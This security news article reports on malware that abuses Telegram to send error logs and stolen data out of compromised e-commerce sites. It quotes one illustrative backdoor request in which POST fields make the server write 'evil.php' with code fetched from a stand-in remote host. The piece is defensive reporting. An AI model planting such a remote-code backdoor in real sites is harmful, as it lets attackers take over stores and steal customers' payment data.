Security

Telegram app used by malware to infiltrate online stores

An ongoing trend observed by cybersecurity analysts and malware researchers reveals Telegram messaging service is being abused by malware authors that target e-commerce websites.

The findings revealed by the web security company Astra highlights that malware actors plant scripts on compromised websites that transmit error logs and other sensitive data over encrypted Telegram channels.

“The error logs or sensitive information that are being sent to the hacker via Telegram is to check whether their malware is planted successfully on a website or not, and in another case, if the malware is planted successfully then they’re sending the sensitive information of the victims to a specific telegram number or channel,” said Kanishk Tagade of Astra in a blog post.

“Magento, Prestashop and WooCommerce stores remain the top target of this hacking campaign,” he continued.

The use of an encrypted service allows attackers to not only evade detection of malicious traffic, but also prevent from being blacklisted as they use Telegram’s infrastructure which would naturally be trusted by many security products.

Image: Malware infected PHP file flagged by Astra caught communicating with Telegram’s API

Astra’s engineers stated, “The hacker sends a request with $_POST[‘name’] =  evil.php  and $_POST[‘content’] = example.com/moreMaliciousCode.txt

“The backdoor script then creates a file called evil.php on the server with the file contents found in example.com/moreMaliciousCode.txt. The hacker then visits compromised-site.com/evil.php to execute the bad code.”

According to the engineers, the hacker group is called “B4JAT4X” based on the clues left in the malicious source code.

These findings follow a recent discovery by Malwarebytes where the company had found web skimmers stealing credit card information from infected websites and transmitting it over Telegram to the attackers.

With the rise in popularity of end-to-end encryption messaging platforms, attacks like these are only expected to grow and evolve with newer tactics.

“Security experts have long been recommending regular malware scanning as a key security measure for the safety of websites,” says Tagade.

“It is time you primed your websites with due security measures to keep it protected at all times,” he concluded.

Ax Sharma

Ax Sharma is a UK-based security researcher, journalist and TV subject matter expert experienced in malware analysis and cybercrime investigations. His areas of interest include open source software security and threat intel analysis. Frequently featured by leading media outlets like the BBC, Channel 5, Fortune, WIRED, The Register, among others, Ax is an active community member of the OWASP Foundation and the British Association of Journalists (BAJ).

Recent Posts

ParkMobile’s $32.8 Million Data Breach Settlement = You get $1?

In 2021, parking app ParkMobile suffered a massive data breach impacting 22 million users whose…

3 days ago

8 Brutal Truths About Cybersecurity I Wish I Knew

When I first got into cybersecurity, I thought it was all about hackers in hoodies…

5 days ago

US Air Force Probes Potential SharePoint-Linked Privacy Breach

The US Air Force is investigating a “privacy-related issue” that may have exposed personally identifiable…

6 days ago

Harrods third-party breach exposes 430,000 customer records, hackers reach out

London’s iconic department store Harrods has disclosed that approximately 430,000 customer records were compromised in…

1 week ago

WestJet confirms customer ID, passports stolen in June cyberattack

WestJet confirmed that in a June 2025 cybersecurity incident, a “sophisticated, criminal third party” gained…

1 week ago

Did You Also Get a ‘Real’ Phishing Email From GitHub.com?

Imagine getting an email straight from GitHub’s own notification system: the same one you've trusted…

2 weeks ago

This website uses cookies.